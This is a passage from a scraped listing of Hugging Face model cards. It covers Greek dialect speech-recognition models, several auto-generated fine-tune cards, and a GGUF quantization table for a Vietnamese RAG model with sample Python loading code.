| 1.3851 | 2.0 | 200 | 1.3526 | 0.56 |
| 1.0214 | 3.0 | 300 | 1.3209 | 0.58 |
| 0.725 | 4.0 | 400 | 1.0294 | 0.72 |
| 0.6425 | 5.0 | 500 | 0.9288 | 0.74 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
ilsp/xls-r-greek-aivaliot | ilsp | 2024-10-10T08:09:59Z | 79 | 1 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"Aivaliot",
"Greek dialect",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-08-08T13:23:42Z | ---
metrics:
- wer
- cer
library_name: transformers
pipeline_tag: automatic-speech-recognition
tags:
- Aivaliot
- Greek dialect
---
# xls-r-greek-aivaliot
Aivaliot is a variety of Greek that was spoken in Aivali (known as Ayvalık in Turkish),
located on the Edremit Gulf in Western Turkey, till the beginning of the 20th century.
After the end of the war between Greece and Turkey (1919–1922) and the defeat of the Greek army,
those Aivaliots who managed to survive flew to Greece, principally to the nearby island of Lesbos,
where they settled in various dialectal enclaves. Aivaliot resembles Lesbian in many respects.
According to Ralli (Ralli, 2019), Aivaliot and Lesbian belong to the group of Northern Greek Dialects,
sharing unstressed /i/ and /u/ deletion and unstressed /o/ and /e/ raising.
Aivaliot morphology and the lexicon are influenced by Turkish, because of a long domination
by the Ottomans, as well as by Italo-Romance, due to the pre-Ottoman Genovese rule and trade with Venice (Ralli, 2019b).
However, there are no Turkish or Italo-Romance influences on phonology or syntax.
In 2002, a handful of first-generation Aivaliot speakers could still be found in Lesbos and
elsewhere in Greece and abroad, where they still remembered and practiced their mother tongue (Ralli, 2019).
Nowadays, the dialect is on the way to extinction, since second-generation speakers either have
a passive knowledge of it, or those living in Lesbos mix their own dialectal variety with the parent Lesbian.
This is the first automatic speech recognition (ASR) model for Aivaliot.
To train the model, we fine-tuned a Greek XLS-R model ([jonatasgrosman/wav2vec2-large-xlsr-53-greek](https://huggingface.co/jonatasgrosman/wav2vec2-large-xlsr-53-greek)) on the Aivaliot resources.
## Resources
We used recordings from the Asia Minor Archive (AMiGre) to train the model. AMiGre was compiled within the
framework of two research projects that ran in the periods 2002-2005 and 2012-2016.
We obtained permission to use it from the studies’ authors. It consists of narratives elicited from
18 elderly speakers (5 male, 13 female), all refugees from Aivali, who had settled in different villages
of the island of Lesbos. The data collection was carried out in 2002-2003, after obtaining a written
consent of the informants, as well as the approval of the Ethics committee of the University of Patras.
The corpus has a total duration of almost 14 hours. It has been transcribed and annotated by
two native speakers of the dialect, using a transcription system based on the Greek alphabet
and orthography, which is adapted according to SAMPA. The annotations include metadata information,
such as the source of the data, the identity and background of the informants, and the conditions of
the data collection. The corpus is stored on the server of the Laboratory of Modern Greek Dialects of
the University of Patras and is [freely accessible online](http://amigredb.philology.upatras.gr)
To prepare the dataset, the texts were normalized (see [greek_dialects_asr/](https://gitlab.com/ilsp-spmd-all/speech/greek_dialects_asr/) for scripts),
and all audio files were converted into a 16 kHz mono format.
We split the Praat annotations into audio-transcription segments, which resulted in a dataset of a total duration of 10h 14m 44s.
Note that the removal of music, long pauses, and non-transcribed segments leads to a reduction of the total audio duration (compared to the initial 14h recordings).
## Metrics
We evaluated the model on the test set split, which consists of 10% of the dataset recordings.
|Model|CER|WER|
|---|---|---|
|pre-trained|104.80%|113.67%|
|fine-tuned|39.55%|73.83%|
## Training hyperparameters
We fine-tuned the baseline model (`wav2vec2-large-xlsr-53-greek`) on an NVIDIA GeForce RTX 3090, using the following hyperparameters:
| arg | value |
|-------------------------------|-------|
| `per_device_train_batch_size` | 8 |
| `gradient_accumulation_steps` | 2 |
| `num_train_epochs` | 35 |
| `learning_rate` | 3e-4 |
| `warmup_steps` | 500 |
## Citation
To cite this work or read more about the training pipeline, see:
S. Vakirtzian, C. Tsoukala, S. Bompolas, K. Mouzou, V. Stamou, G. Paraskevopoulos, A. Dimakis, S. Markantonatou, A. Ralli, A. Anastasopoulos, Speech Recognition for Greek Dialects: A Challenging Benchmark, Proceedings of the Annual Conference of the International Speech Communication Association (INTERSPEECH), 2024. |
ilsp/xls-r-greek-cretan | ilsp | 2024-10-10T08:07:44Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"Cretan",
"Greek dialect",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-08-08T14:23:05Z | ---
metrics:
- wer
- cer
library_name: transformers
pipeline_tag: automatic-speech-recognition
tags:
- Cretan
- Greek dialect
---
# Cretan XLS-R model
Cretan is a variety of Modern Greek predominantly used by speakers who reside on the island of Crete or
belong to the Cretan diaspora. This includes communities of Cretan origin that were relocated to the
village of Hamidieh in Syria and to Western Asia Minor, following the population exchange between
Greece and Turkey in 1923. The historical and geographical factors that have shaped the development
and preservation of the dialect include the long-term isolation of Crete from the mainland, and the
successive domination of the island by foreign powers, such as the Arabs, the Venetians, and the Turks,
over a period of seven centuries. Cretan has been divided based on its phonological, phonetic,
morphological, and lexical characteristics into two major dialect groups: the western and the eastern.
The boundary between these groups coincides with the administrative division of the island into the
prefectures of Rethymno and Heraklion. Kontosopoulos (2008) argues that the eastern dialect group is more
homogeneous than the western one, which shows more variation across all levels of linguistic analysis.
Contrary to other Modern Greek Dialects, Cretan does not face the threat of extinction, as it remains
the sole means of communication for a large number of speakers in various parts of the island.
This is the first automatic speech recognition (ASR) model for Cretan.
To train the model, we fine-tuned a Greek XLS-R model ([jonatasgrosman/wav2vec2-large-xlsr-53-greek](https://huggingface.co/jonatasgrosman/wav2vec2-large-xlsr-53-greek)) on the Cretan resources (see below).
## Resources
For the compilation of the Cretan corpus, we gathered 32 tapes containing material from
radio broadcasts in digital format, with permission from the Audiovisual Department of the
Vikelaia Municipal Library of Heraklion, Crete. These broadcasts were recorded and
aired by Radio Mires, in the Messara region of Heraklion, during the period 1998-2001,
totaling 958 minutes and 47 seconds. These recordings primarily consist of narratives
by one speaker, Ioannis Anagnostakis, who is responsible for their composition. In terms
of textual genre, the linguistic content of the broadcasts consists of folklore
narratives expressed in the local linguistic variety. Out of the total volume of material
collected, we utilized nine tapes. Criteria for material selection included, on the one hand,
maximizing digital clarity of speech and, on the other hand, ensuring representative sampling
across the entire three-year period of radio recordings. To obtain an initial transcription,
we employed the Large-v2 model, which was the largest Whisper model at the time. Subsequently,
the transcripts were manually corrected in collaboration with the local community.
The transcription system that was used was based on the Greek alphabet and orthography
and it was annotated in Praat.
To prepare the dataset, the texts were normalized (see [greek_dialects_asr/](https://gitlab.com/ilsp-spmd-all/speech/greek_dialects_asr/) for scripts),
and all audio files were converted into a 16 kHz mono format.
We split the Praat annotations into audio-transcription segments, which resulted in a dataset of a total duration of 1h 21m 12s.
Note that the removal of music, long pauses, and non-transcribed segments leads to a reduction of the total audio duration
(compared to the initial 2h recordings of the 9 tapes).
## Metrics
We evaluated the model on the test set split, which consists of 10% of the dataset recordings.
|Model|WER|CER|
|---|---|---|
|pre-trained|104.83%|91.73%|
|fine-tuned|28.27%|7.88%|
## Training hyperparameters
We fine-tuned the baseline model (`wav2vec2-large-xlsr-53-greek`) on an NVIDIA GeForce RTX 3090, using the following hyperparameters:
| arg | value |
|-------------------------------|-------|
| `per_device_train_batch_size` | 8 |
| `gradient_accumulation_steps` | 2 |
| `num_train_epochs` | 35 |
| `learning_rate` | 3e-4 |
| `warmup_steps` | 500 |
## Citation
To cite this work or read more about the training pipeline, see:
S. Vakirtzian, C. Tsoukala, S. Bompolas, K. Mouzou, V. Stamou, G. Paraskevopoulos, A. Dimakis, S. Markantonatou, A. Ralli, A. Anastasopoulos, Speech Recognition for Greek Dialects: A Challenging Benchmark, Proceedings of the Annual Conference of the International Speech Communication Association (INTERSPEECH), 2024. |
iarchitarora/gemma-medical_qa-Finetune | iarchitarora | 2024-10-10T08:05:42Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"gemma",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T08:00:52Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Mund86/edsface | Mund86 | 2024-10-10T08:04:49Z | 5 | 0 | null | [
"license:other",
"region:us"
] | null | 2024-10-10T07:01:34Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
--- |
borno1/WSDD-continual | borno1 | 2024-10-10T08:04:06Z | 29 | 0 | diffusers | [
"diffusers",
"safetensors",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-10-10T08:02:23Z | ---
license: creativeml-openrail-m
tags:
- text-to-image
---
### Tecaher_sdv1.5_epochs_5000 on Stable Diffusion via Dreambooth
#### model by borno1
This your the Stable Diffusion model fine-tuned the Tecaher_sdv1.5_epochs_5000 concept taught to Stable Diffusion with Dreambooth.
It can be used by modifying the `instance_prompt`: **flower**
You can also train your own concepts and upload them to the library by using [this notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_training.ipynb).
And you can run your new concept via `diffusers`: [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb), [Spaces with the Public Concepts loaded](https://huggingface.co/spaces/sd-dreambooth-library/stable-diffusion-dreambooth-concepts)
Here are the images used for training this concept:
|
rytsar/finetuning-spam-model-5000-samples | rytsar | 2024-10-10T07:59:41Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T07:52:28Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: finetuning-spam-model-5000-samples
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuning-spam-model-5000-samples
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0333
- Accuracy: 0.9903
- F1: 0.9903
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
viraxeva/whisper-small-indonesian-common-voice | viraxeva | 2024-10-10T07:51:48Z | 124 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"generated_from_trainer",
"id",
"dataset:mozilla-foundation/common_voice_17_0",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-09T23:24:58Z | ---
library_name: transformers
language:
- id
license: apache-2.0
base_model: openai/whisper-small
tags:
- generated_from_trainer
datasets:
- mozilla-foundation/common_voice_17_0
metrics:
- wer
model-index:
- name: Whisper Small Indonesia - Vira Maftukhatul
results:
- task:
name: Automatic Speech Recognition
type: automatic-speech-recognition
dataset:
name: Common Voice 17.0
type: mozilla-foundation/common_voice_17_0
config: id
split: test
args: 'config: id, split: test'
metrics:
- name: Wer
type: wer
value: 20.066049583701567
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Whisper Small Indonesia - Vira Maftukhatul
This model is a fine-tuned version of [openai/whisper-small](https://huggingface.co/openai/whisper-small) on the Common Voice 17.0 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2891
- Wer: 20.0660
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- training_steps: 500
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:------:|:----:|:---------------:|:-------:|
| 0.4167 | 0.2417 | 500 | 0.2891 | 20.0660 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
skdrx/amd135m_reasoning_finetune | skdrx | 2024-10-10T07:49:23Z | 24 | 0 | null | [
"safetensors",
"gguf",
"llama",
"dataset:nvidia/OpenMathInstruct-2",
"dataset:KingNish/reasoning-base-20k",
"base_model:amd/AMD-Llama-135m",
"base_model:quantized:amd/AMD-Llama-135m",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T07:46:32Z | ---
license: apache-2.0
datasets:
- nvidia/OpenMathInstruct-2
- KingNish/reasoning-base-20k
base_model:
- amd/AMD-Llama-135m
---
Finetune of amd135m using Rchatml format form reasoning-base-20k dataset from KingNish. Trying to see if i can get this small model to reason. Improvements, suggestions welcome. Will upload training script and dataset script soon (yell at me if I dont) |
RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf | RichardErkhov | 2024-10-10T07:49:03Z | 11 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T04:27:59Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Vi-Qwen2-7B-RAG - GGUF
- Model creator: https://huggingface.co/AITeamVN/
- Original model: https://huggingface.co/AITeamVN/Vi-Qwen2-7B-RAG/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Vi-Qwen2-7B-RAG.Q2_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q2_K.gguf) | Q2_K | 2.81GB |
| [Vi-Qwen2-7B-RAG.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Vi-Qwen2-7B-RAG.IQ3_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Vi-Qwen2-7B-RAG.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Vi-Qwen2-7B-RAG.IQ3_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Vi-Qwen2-7B-RAG.Q3_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K.gguf) | Q3_K | 3.55GB |
| [Vi-Qwen2-7B-RAG.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Vi-Qwen2-7B-RAG.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Vi-Qwen2-7B-RAG.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Vi-Qwen2-7B-RAG.Q4_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Vi-Qwen2-7B-RAG.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Vi-Qwen2-7B-RAG.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Vi-Qwen2-7B-RAG.Q4_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K.gguf) | Q4_K | 4.36GB |
| [Vi-Qwen2-7B-RAG.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Vi-Qwen2-7B-RAG.Q4_1.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Vi-Qwen2-7B-RAG.Q5_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Vi-Qwen2-7B-RAG.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Vi-Qwen2-7B-RAG.Q5_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K.gguf) | Q5_K | 5.07GB |
| [Vi-Qwen2-7B-RAG.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Vi-Qwen2-7B-RAG.Q5_1.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Vi-Qwen2-7B-RAG.Q6_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q6_K.gguf) | Q6_K | 5.82GB |
| [Vi-Qwen2-7B-RAG.Q8_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q8_0.gguf) | Q8_0 | 7.54GB |
Original model description:
---
base_model: Qwen/Qwen2-7B-Instruct
language:
- vi
license: apache-2.0
tags:
- retrieval-augmented-generation
- text-generation-inference
library_name: transformers
pipeline_tag: text-generation
---
## Model Card: Vi-Qwen2-7B-RAG
**Mô tả mô hình:**
Vi-Qwen2-7B-RAG là một mô hình ngôn ngữ lớn được tinh chỉnh từ mô hình cơ sở Qwen2-7B-Instruct (https://huggingface.co/Qwen/Qwen2-7B-Instruct) phục vụ cho RAG tasks. Mô hình được đào tạo trên tập dữ liệu tiếng Việt với mục tiêu cải thiện khả năng xử lý ngôn ngữ tiếng Việt và nâng cao hiệu suất cho các tác vụ Retrieval Augmented Generation (RAG).
**Mục đích sử dụng:**
Mô hình Vi-Qwen2-7B-RAG được thiết kế chuyên biệt cho RAG (ngữ cảnh chấp nhận lên đến 8192 tokens), vì vậy nó có thể giải quyết các trường hợp sau:
* Khả năng chống nhiều: Mô hình trích xuất thông tin hữu ích từ các tài liệu nhiễu. ( 1 positive + 4 negative hoặc 1 negative)
* Loại bỏ negative: Mô hình từ chối trả lời câu hỏi khi kiến thức cần thiết không có trong bất kỳ tài liệu nào được truy xuất. (1-6 negative)
* Tích hợp thông tin: Mô hình trả lời các câu hỏi phức tạp đòi hỏi phải tích hợp thông tin từ nhiều tài liệu. ( 2 part positive + 3 negative hoặc 3 part positive + 2 negative)
* Xác đinh positive/negative: Mô hình xác định xem ngữ cảnh có chứa câu trả lời cho câu hỏi hay không. (độ chính xác xấp xỉ 99%)
Ngoài ra, chúng tôi cũng triển khai các mô hình nhỏ hơn phù hợp với mục đích sử dụng khác nhau như Vi-Qwen2-1.5B-RAG (https://huggingface.co/AITeamVN/Vi-Qwen2-1.5B-RAG)
và Vi-Qwen2.5-3B-RAG (https://huggingface.co/AITeamVN/Vi-Qwen2-3B-RAG)
* Ngoài RAG task, bạn vẫn có thể chatbot bình thường với model của chúng tôi. Thậm chí có thể hỏi các câu hỏi liên tục với ngữ cảnh đầu vào.
**Hạn chế:**
Vì mô hình chỉ được thiết kế chuyên biệt cho RAG task, nên có thể gặp 1 số hạn chế sau:
* Không đảm bảo độ chính xác về các câu hỏi liên quan đến chính trị, xã hội,...
* Có thể thể hiện thành kiến hoặc quan điểm không phù hợp.
**Các cách sử dụng:**
#### 1. Sử dụng cơ bản
Ngữ cảnh đầu vào chỉ chứa 1 ngữ cảnh (1 postive hoặc 1 negative).
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
path = 'AITeamVN/Vi-Qwen2-7B-RAG'
model = AutoModelForCausalLM.from_pretrained(
path,
torch_dtype=torch.bfloat16,
device_map="auto",
use_cache=True
)
tokenizer = AutoTokenizer.from_pretrained(path)
system_prompt = "Bạn là một trợ lí Tiếng Việt nhiệt tình và trung thực. Hãy luôn trả lời một cách hữu ích nhất có thể."
template = '''Chú ý các yêu cầu sau:
- Câu trả lời phải chính xác và đầy đủ nếu ngữ cảnh có câu trả lời.
- Chỉ sử dụng các thông tin có trong ngữ cảnh được cung cấp.
- Chỉ cần từ chối trả lời và không suy luận gì thêm nếu ngữ cảnh không có câu trả lời.
Hãy trả lời câu hỏi dựa trên ngữ cảnh:
### Ngữ cảnh :
{context}
### Câu hỏi :
{question}
### Trả lời :'''
# Ví dụ
context = '''Thuốc Insuact 10 trị bệnh gì? Thuốc Insuact 10mg có thành phần chính là Atorvastatin. Thuốc Insuact 10 có tác dụng làm giảm cholesterol và triglycerid trong máu ở bệnh nhân tăng cholesterol máu nguyên phát, rối loạn lipid máu hỗn hợp. 1. Thuốc Insuact 10 trị bệnh gì? Thuốc Insuact 10 thuộc nhóm thuốc điều trị rối loạn lipid máu, có thành phần chính là Atorvastatin 10mg. Atorvastatin có tác dụng làm giảm cholesterol, ức chế enzym tạo cholesterol ở gan. Atorvastatin làm giảm cholesterol chung bao gồm cholesterol LDL , triglycerid trong máu. Thuốc Insuact 10mg được bào chế dưới dạng viên nén bao phim, được chỉ định dùng trong những trường hợp sau: Ðiều trị hỗ trợ tăng cholesterol máu nguyên phát và rối loạn lipid máu hỗn hợp trên bệnh nhân đang áp dụng chế độ ăn kiêng để làm giảm cholesterol toàn phần , cholesterol LDL , apolipoprotein B, triglycerid và tăng cholesterol HDL . Insuact 10 cũng được dùng để điều trị rối loạn betalipoprotein trong máu nguyên phát. Ðiều trị hỗ trợ tăng cholesterol trong máu có tính gia đình đồng hợp tử trên bệnh nhân đang áp dụng các biện pháp làm giảm lipid khác để làm giảm cholesterol toàn phần và cholesterol LDL. 2. Liều dùng và cách dùng thuốc Insuact 10 Cách dùng thuốc Insuact 10: Thuốc được dùng theo đường uống, uống khi bụng đói hoặc no đều được, có thể uống vào bất cứ lúc nào trong ngày. Liều dùng thuốc Insuact 10mg khởi đầu là 10mg/lần/ngày, tối đa là 80mg/lần/ngày. Liều dùng thuốc Insuact 10 tùy vào mục đích điều trị cụ thể như sau: Tăng cholesterol máu nguyên phát và rối loạn lipid máu phối hợp: 10mg/lần/ngày, sau 2 - 4 tuần sẽ thấy hiệu quả của thuốc. Thuốc cần được được sử dụng duy trì trong thời gian dài để có hiệu quả. Tăng cholesterol trong máu có tính gia đình đồng hợp tử: Liều thường dùng là thuốc Insuact 10mg /lần/ngày và tối đa là 80mg/lần/ngày. Rối loạn lipid máu nghiêm trọng ở trẻ từ 10 - 17 tuổi: 10mg/lần/ngày, sau đó tăng lên 20mg/lần/ngày tùy vào cơ địa, tiến triển bệnh và khả năng dung nạp thuốc của người bệnh. Thời gian điều chỉnh liều thuốc tối thiểu là 4 tuần. 3. Tác dụng phụ của thuốc Insuact 10mg Thuốc Insuact 10 có thể gây một số tác dụng phụ không mong muốn với tần suất như sau: Thường gặp: Viêm mũi - họng, phản ứng dị ứng, tăng đường huyết, nhức đầu, đau thanh quản, chảy máu cam , đau cơ, co thắt cơ, đau khớp, sưng khớp, đau các chi, đau lưng, xét nghiệm gan bất thường, tăng creatine kinase trong máu, buồn nôn, khó tiêu, đầy hơi, táo bón, tiêu chảy. Ít gặp: Insuact 10 ít gây hạ đường huyết, tăng cân, chán ăn, mất ngủ, gặp ác mộng, choáng váng, dị cảm, mất trí nhớ, giảm cảm giác, loạn vị giác , nôn, đau bụng, ợ hơi, viêm tụy, viêm gan, nổi mày đay , phát ban, ngứa, rụng tóc, đau cổ, mỏi cơ, mệt mỏi, suy 